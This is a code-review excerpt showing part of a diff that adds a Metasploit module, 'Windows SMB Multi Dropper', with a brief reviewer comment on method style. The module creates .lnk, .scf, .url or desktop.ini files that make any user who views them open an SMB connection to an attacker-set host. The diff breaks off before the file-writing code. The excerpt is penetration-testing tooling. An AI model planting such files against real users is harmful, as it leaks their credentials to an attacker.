modules/auxiliary/multidrop.rb

```diff
@@ -0,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/auxiliary/report'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows SMB Multi Dropper',
+        'Description'   => %q{
+          This module dependent on the given filename extension creates either
+          a .lnk, .scf, .url, desktop.ini file which includes a reference
+          to the the specified remote host, causing SMB connections to be initiated
+          from any user that views the file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Richard Davy - secureyourit.co.uk' ],
+        'Platform'      => [ 'win' ],
+
+      ))
+    register_options(
+      [
+        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
+        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, desktop.ini", "word.lnk"]),
+
+      ])
+  end
+
+  def run
+    if datastore['FILENAME'].chars.last(3).join=="lnk"
+        createlnk()
+    elsif datastore['FILENAME'].chars.last(3).join=="scf"
+        createscf()
+    elsif datastore['FILENAME']=="desktop.ini"
+        create_desktopini()
+    elsif datastore['FILENAME'].chars.last(3).join=="url"
+        create_url()
+    end
+
+  end
+
+
+  def createlnk()
```

Comment:
No need for `()` on method definition when no arguments are specified.

Reply:
fixed